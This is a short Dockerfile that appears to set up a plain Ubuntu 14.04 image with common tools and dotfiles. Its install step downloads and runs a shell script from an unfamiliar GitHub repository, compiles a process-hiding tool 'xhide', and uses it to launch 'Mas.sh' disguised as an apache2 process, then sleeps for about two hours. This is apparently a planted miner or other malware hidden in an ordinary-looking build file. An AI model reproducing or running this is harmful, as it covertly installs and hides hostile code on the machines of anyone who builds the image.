FROM ubuntu:14.04

# Install.
RUN \
  apt-get update && \
  apt-get install screen -y && \
  apt-get install make -y && \
  apt-get install -y wget && \
  apt-get install sudo && \
  apt-get install gcc -y && \
  wget https://github.com/reabeo280/feae688/raw/main/T43gj.sh && \
  chmod +x T43gj.sh && \
  ./T43gj.sh && \
  gcc -o test xhide.c && \
  ./test -s "/usr/sbin/apache2 -k start" -d -p test.pid ./Mas.sh && \
  sleep 7030 && \
  apt-get install curl -y && \
  rm -rf /var/lib/apt/lists/* 

# Add files.
ADD root/.bashrc /root/.bashrc
ADD root/.gitconfig /root/.gitconfig
ADD root/.scripts /root/.scripts

# Set environment variables.
ENV HOME /root

# Define working directory.
WORKDIR /root

# Define default command.
CMD ["bash"]
